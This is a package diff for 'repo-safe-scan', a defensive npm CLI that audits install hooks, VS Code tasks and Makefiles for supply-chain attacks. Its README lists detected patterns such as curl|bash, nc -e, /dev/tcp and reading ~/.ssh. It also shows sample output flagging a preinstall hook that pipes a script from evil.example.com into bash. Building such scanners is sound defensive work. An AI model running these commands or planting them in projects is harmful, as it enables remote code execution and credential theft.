repo-safe-scan 1.0.0

package/README.md

@@ -0,0 +1,194 @@
+# repo-safe-scan
+
+> **Audit `package.json` scripts, VSCode tasks, Makefiles and shell scripts for supply-chain attack patterns — before you `npm install`.**
+
+[![Node.js >=18](https://img.shields.io/badge/node-%3E%3D18-brightgreen)](https://nodejs.org/)
+[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](LICENSE)
+
+---
+
+## Why?
+
+Most security tools scan your **dependencies** for known vulnerabilities (e.g. CVEs). But attackers increasingly exploit **script execution hooks** that run automatically when you clone and install a repo:
+
+| Vector | Risk |
+|--------|------|
+| `preinstall` / `postinstall` in `package.json` | Executes on every `npm install` — silently |
+| `.vscode/tasks.json` | Auto-runs tasks when VS Code opens the folder |
+| `.vscode/settings.json` | Can hijack your integrated terminal |
+| `Makefile` default targets | Executes on `make` |
+| `*.sh` scripts | Called by any of the above |
+
+`repo-safe-scan` detects these patterns **before** you run anything, protecting your machine from reverse shells, credential exfiltration, and destructive payloads.
+
+---
+
+## Installation
+
+```bash
+# Install globally
+npm install -g repo-safe-scan
+
+# Or use via npx (no install needed)
+npx repo-safe-scan /path/to/repo
+```
+
+---
+
+## Usage
+
+```bash
+repo-safe-scan [path] [options]
+```
+
+### Options
+
+| Flag | Description | Default |
+|------|-------------|---------|
+| `[path]` | Repository root to scan | `.` (current dir) |
+| `--severity <level>` | Minimum severity to report: `medium` \| `high` \| `critical` | `medium` |
+| `--include-node-modules` | Scan dependencies in `node_modules` for malicious lifecycle hooks | off |
+| `--json` | Output findings as JSON (for CI pipelines) | off |
+| `--no-color` | Disable colored terminal output | off |
+| `--version` | Print version | |
+
+### Examples
+
+```bash
+# Scan a locally cloned repo before installing
+repo-safe-scan ./suspicious-package
+
+# Scan including deeply nested dependencies
+repo-safe-scan ./suspicious-package --include-node-modules
+
+# Only show critical findings
+repo-safe-scan ./suspicious-package --severity critical
+
+# Machine-readable output for CI
+repo-safe-scan . --json > results.json
+```
+
+---
+
+## Features
+
+### 1. Robust JavaScript AST Parsing
+Attackers know you might be grepping for `curl` or `child_process`. They obfuscate.
+`repo-safe-scan` includes a **JavaScript AST (Abstract Syntax Tree) Analyzer** powered by `acorn` that understands code structure. It tracks variable bindings (`const cp = require("child_process")`), object destructuring (`const { exec } = cp`), and dynamic concatenation (`require("child_" + "process")`) to accurately flag dangerous execution streams.
+
+### 2. Command Normalization Engine
+Before testing configured commands against security rules, commands are normalized (quotes stripped, lowercase enforced, whitespace collapsed). This neutralizes straightforward casing and spacing bypass tricks (e.g., `cUrL        eViL.cOm | bAsH`).
+
+### 3. Smart Risk Scoring System
+The scanner computes a normalized **Repository Risk Score** out of 10.0 based on a weighted algorithm:
+- Critical finding = `25 pts`
+- High finding = `10 pts`
+- Medium finding = `4 pts`
+- Auto-executed Lifecycle Hooks (`preinstall`, etc.) = `+10 pts` bonus penalty.
+
+### 4. Dependency Lifecycle Scanning
+Use the `--include-node-modules` flag to hunt for supply-chain bombs hidden deep inside dependency lifecycle scripts in `node_modules/*/package.json`.
+
+---
+
+## What it Detects
+
+The engine uses a modular rule system organized by category (`src/rules/`):
+
+| Category | Examples |
+|----------|---------|
+| **remote-execution** | `curl \| bash`, `wget \| sh`, `Invoke-Expression` |
+| **obfuscation** | `eval()`, `new Function()`, `base64 -d`, `fromCharCode` |
+| **reverse-shell** | `nc -e`, `/dev/tcp/`, `socat` |
+| **credential-theft** | Access to `~/.ssh`, `~/.aws/credentials`, `.npmrc`, `.env` |
+| **destructive** | `rm -rf`, `del /f /q`, `format C:` |
+| **privilege-escalation** | `sudo` in npm scripts, `chmod +x` after download |
+| **tls-bypass** | `curl -k`, `wget --no-check-certificate` |
+| **reconnaissance** | `whoami \|`, `ifconfig \| curl` |
+
+---
+
+## Output
+
+### Terminal (default)
+
+```
+  repo-safe-scan v1.1.0  🔍 Scanning: ./suspect-repo
+
+  📄 package.json
+  ────────────────────────────────────────────────────────────
+  CRITICAL  LIFECYCLE  curl-pipe-shell
+  Description: Downloads and pipes content directly into a shell
+  Category:    remote-execution
+  Script:      preinstall
+  Command:     curl http://evil.example.com/payload.sh | bash
+
+     ⚠ This script runs automatically on `npm install` — no user confirmation required. This is the primary supply-chain attack vector.
+
+  ════════════════════════════════════════════════════════════
+  SUMMARY  1 critical  0 high  0 medium  (1 auto-executed lifecycle hooks)
+  Scanned path: ./suspect-repo
+
+  ╔═════════════════════════════════════════╗
+  ║  Repository Risk Score:  3.5 / 10       ║
+  ║  ███████░░░░░░░░░░░░░  MODERATE         ║
+  ╚═════════════════════════════════════════╝
+```
+
+---
+
+## Development
+
+The project is fully written in **TypeScript**.
+
+```bash
+# Clone and install
+git clone https://github.com/Chetan2708/repo-safe-scan.git
+cd repo-safe-scan
+npm install
+
+# Build
+npm run build
+
+# Run tests
+npm test
+
+# Run tests with coverage
+npm run test:coverage
+
+# Scan the repo itself
+npm start -- .
+```
+
+### Project Structure
+
+```
+repo-safe-scan/
+├── bin/
+│   └── cli.ts               # CLI CLI orchestration & output rendering
+├── src/
+│   ├── scanner.ts           # Core orchestrator 
+│   ├── scoring.ts           # Risk Score logic
+│   ├── analyzers/           # Plugable analyzer registry
+│   │   ├── index.ts              # Registry
+│   │   ├── jsAstAnalyzer.ts      # AST JS/TS parsing (eval, cp.exec)
+│   │   ├── packageAnalyzer.ts    # package.json scripts
+│   │   ├── vscodeAnalyzer.ts     # .vscode/ tasks/settings
+│   │   ├── makefileAnalyzer.ts   # Makefile targets
+│   │   ├── shellScriptAnalyzer.ts# *.sh / *.bash 
+│   │   └── nodeModulesAnalyzer.ts# --include-node-modules scanner
+│   └── rules/               # Modular rule definitions
+│       ├── rules.ts         # Rule aggregator
+│       ├── destructive.rules.ts
+│       ├── execution.rules.ts
+│       ├── exfiltration.rules.ts
+│       └── obfuscation.rules.ts
+└── tests/
+    └── fixtures/            # Test repositories
+```
+
+---
+
+## License
+
+MIT © 2026

package/dist/bin/cli.d.ts

@@ -0,0 +1,3 @@
+#!/usr/bin/env node
+export {};
+//# sourceMappingURL=cli.d.ts.map

package/dist/bin/cli.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"cli.d.ts","sourceRoot":"","sources":["../../bin/cli.ts"],"names":[],"mappings":""}

package/dist/bin/cli.js

@@ -0,0 +1,165 @@
+#!/usr/bin/env node
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+const path_1 = __importDefault(require("path"));
+const commander_1 = require("commander");
+const chalk_1 = __importDefault(require("chalk"));
+const scanner_1 = require("../src/scanner");
+// Resolve package.json relative to the compiled file's location at runtime
+// Works correctly from both bin/ (ts-node) and dist/bin/ (node)
+// eslint-disable-next-line @typescript-eslint/no-var-requires
+const { version } = require(path_1.default.resolve(__dirname, "../../package.json"));
+const SEVERITY_ORDER = {
+    medium: 1,
+    high: 2,
+    critical: 3,
+};
+const SEVERITY_ICONS = {
+    critical: chalk_1.default.bgRed.white.bold(" CRITICAL "),
+    high: chalk_1.default.bgYellow.black.bold("  HIGH   "),
+    medium: chalk_1.default.bgBlue.white.bold(" MEDIUM  "),
+};
+const SEVERITY_COLORS = {
+    critical: chalk_1.default.red.bold,
+    high: chalk_1.default.yellow.bold,
+    medium: chalk_1.default.cyan.bold,
+};
+function isSeverity(value) {
+    return value === "medium" || value === "high" || value === "critical";
+}
+commander_1.program
+    .name("repo-safe-scan")
+    .description("Audit package.json scripts, VSCode tasks, Makefiles and shell scripts for supply-chain attack patterns")
+    .version(version)
+    .argument("[path]", "Path to repository root", ".")
+    .option("--json", "Output findings as JSON (machine-readable, for CI)")
+    .option("--severity <level>", "Minimum severity to report: medium | high | critical", "medium")
+    .option("--include-node-modules", "Scan dependencies in node_modules for malicious lifecycle hooks")
+    .option("--no-color", "Disable colored output")
+    .action(async (repoPath, options) => {
+    const minSeverity = options.severity.toLowerCase();
+    if (!isSeverity(minSeverity)) {
+        console.error(chalk_1.default.red(`Invalid severity "${minSeverity}". Use: medium, high, or critical`));
+        process.exit(2);
+    }
+    // ── Run Scan ─────────────────────────────────────────────────────────
+    let result;
+    try {
+        result = await (0, scanner_1.scanRepo)(repoPath, { includeNodeModules: options.includeNodeModules });
+    }
+    catch (err) {
+        console.error(chalk_1.default.red(`\nFatal error during scan: ${err.message}`));
+        process.exit(2);
+    }
+    const { findings, riskScore } = result;
+    // ── Filter by severity ────────────────────────────────────────────────
+    const minScore = SEVERITY_ORDER[minSeverity];
+    const filtered = findings.filter((f) => {
+        const sev = f.rule.severity;
+        return (SEVERITY_ORDER[sev] ?? 0) >= minScore;
+    });
+    // ── Sort: critical → high → medium, lifecycle first ───────────────────
+    filtered.sort((a, b) => {
+        const sevDiff = (SEVERITY_ORDER[b.rule.severity] ?? 0) -
+            (SEVERITY_ORDER[a.rule.severity] ?? 0);
+        if (sevDiff !== 0)
+            return sevDiff;
+        return b.lifecycle ? 1 : -1;
+    });
+    // ── JSON output ───────────────────────────────────────────────────────
+    if (options.json) {
+        process.stdout.write(JSON.stringify({ scannedPath: repoPath, riskScore, findings: filtered }, null, 2) + "\n");
+        if (filtered.length > 0)
+            process.exitCode = 1;
+        return;
+    }
+    // ── Pretty output ─────────────────────────────────────────────────────
+    console.log(chalk_1.default.bold.white(`\n  repo-safe-scan`) +
+        chalk_1.default.gray(` v${version}`) +
+        `  🔍 Scanning: ${chalk_1.default.cyan(repoPath)}\n`);
+    if (filtered.length === 0) {
+        console.log(chalk_1.default.green("  ✔ No suspicious patterns found") +
+            chalk_1.default.gray(` (severity >= ${minSeverity})\n`));
+        console.log(chalk_1.default.gray(`  ${"═".repeat(50)}`));
+        console.log(`  ${chalk_1.default.bold("Repository Risk Score:")} ${chalk_1.default.green.bold(riskScore.score + " / 10")}  ${chalk_1.default.bgGreen.black.bold(" " + riskScore.label + " ")}\n`);
+        return;
+    }
+    // Group by file
+    const byFile = new Map();
+    for (const finding of filtered) {
+        if (!byFile.has(finding.file))
+            byFile.set(finding.file, []);
+        byFile.get(finding.file).push(finding);
+    }
+    for (const [file, fileFindings] of byFile) {
+        console.log(chalk_1.default.bold.white(`  📄 ${file}`));
+        console.log(chalk_1.default.gray("  " + "─".repeat(60)));
+        for (const finding of fileFindings) {
+            const sev = finding.rule.severity;
+            const icon = SEVERITY_ICONS[sev] ?? chalk_1.default.gray(" UNKNOWN ");
+            const colorFn = SEVERITY_COLORS[sev] ?? chalk_1.default.white;
+            const lifecycleBadge = finding.lifecycle
+                ? chalk_1.default.bgMagenta.white.bold(" LIFECYCLE ") + " "
+                : "";
+            console.log(`\n  ${icon} ${lifecycleBadge}${colorFn(finding.rule.id)}`);
+            console.log(`  ${chalk_1.default.gray("Description:")} ${finding.rule.description}`);
+            console.log(`  ${chalk_1.default.gray("Category:   ")} ${finding.rule.category}`);
+            if (finding.scriptName) {
+                console.log(`  ${chalk_1.default.gray("Script:     ")} ${finding.scriptName}`);
+            }
+            if (finding.command) {
+                const truncated = finding.command.length > 120
+                    ? finding.command.slice(0, 117) + "..."
+                    : finding.command;
+                console.log(`  ${chalk_1.default.gray("Command:    ")} ${chalk_1.default.red(truncated)}`);
+            }
+            if (finding.detail) {
+                console.log(`  ${chalk_1.default.gray("Detail:     ")} ${finding.detail}`);
+            }
+            if (finding.lifecycleMessage) {
+                console.log(`\n  ${chalk_1.default.yellow.dim("   " + finding.lifecycleMessage)}`);
+            }
+        }
+        console.log();
+    }
+    // ── Summary ───────────────────────────────────────────────────────────
+    const critCount = filtered.filter((f) => f.rule.severity === "critical").length;
+    const highCount = filtered.filter((f) => f.rule.severity === "high").length;
+    const medCount = filtered.filter((f) => f.rule.severity === "medium").length;
+    const lifecycleCount = filtered.filter((f) => f.lifecycle).length;
+    console.log(chalk_1.default.gray("  " + "═".repeat(60)));
+    console.log(`  ${chalk_1.default.bold("SUMMARY")}  ` +
+        chalk_1.default.red.bold(`${critCount} critical`) +
+        "  " +
+        chalk_1.default.yellow.bold(`${highCount} high`) +
+        "  " +
+        chalk_1.default.cyan.bold(`${medCount} medium`) +
+        (lifecycleCount > 0
+            ? "  " +
+                chalk_1.default.magenta.bold(`(${lifecycleCount} auto-executed lifecycle hooks)`)
+            : ""));
+    console.log(chalk_1.default.gray(`  Scanned path: ${repoPath}`) + "\n");
+    // ── Risk Score ────────────────────────────────────────────────────────
+    let rsColor = chalk_1.default.green;
+    if (riskScore.label === "CRITICAL")
+        rsColor = chalk_1.default.red;
+    else if (riskScore.label === "HIGH")
+        rsColor = chalk_1.default.yellow;
+    else if (riskScore.label === "MODERATE")
+        rsColor = chalk_1.default.cyan;
+    const barLength = 20;
+    const filledLength = Math.round((riskScore.score / 10) * barLength);
+    const filled = "█".repeat(filledLength);
+    const empty = "░".repeat(barLength - filledLength);
+    const bar = rsColor(filled) + chalk_1.default.gray(empty);
+    console.log(chalk_1.default.bold.white(`  ╔═════════════════════════════════════════╗`));
+    console.log(chalk_1.default.bold.white(`  ║  Repository Risk Score:  ${rsColor.bold(riskScore.score.toFixed(1) + " / 10".padEnd(5))}     ║`));
+    console.log(chalk_1.default.bold.white(`  ║  ${bar}  ${rsColor.bold(riskScore.label.padEnd(8))} ║`));
+    console.log(chalk_1.default.bold.white(`  ╚═════════════════════════════════════════╝\n`));
+    process.exitCode = 1;
+});
+commander_1.program.parse();
+//# sourceMappingURL=cli.js.map

package/dist/bin/cli.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"cli.js","sourceRoot":"","sources":["../../bin/cli.ts"],"names":[],"mappings":"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"}

package/dist/src/analyzers/index.d.ts

@@ -0,0 +1,5 @@
+import type { Finding, ScanOptions } from "../types";
+export type Analyzer = (path: string, opts?: ScanOptions) => Promise<Finding[]>;
+export declare const analyzers: Analyzer[];
+export declare const optionalAnalyzers: Record<string, Analyzer>;
+//# sourceMappingURL=index.d.ts.map

package/dist/src/analyzers/index.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../../src/analyzers/index.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,OAAO,EAAE,WAAW,EAAE,MAAM,UAAU,CAAC;AAQrD,MAAM,MAAM,QAAQ,GAAG,CAAC,IAAI,EAAE,MAAM,EAAE,IAAI,CAAC,EAAE,WAAW,KAAK,OAAO,CAAC,OAAO,EAAE,CAAC,CAAC;AAEhF,eAAO,MAAM,SAAS,EAAE,QAAQ,EAM/B,CAAC;AAEF,eAAO,MAAM,iBAAiB,EAAE,MAAM,CAAC,MAAM,EAAE,QAAQ,CAEtD,CAAC"}

package/dist/src/analyzers/index.js

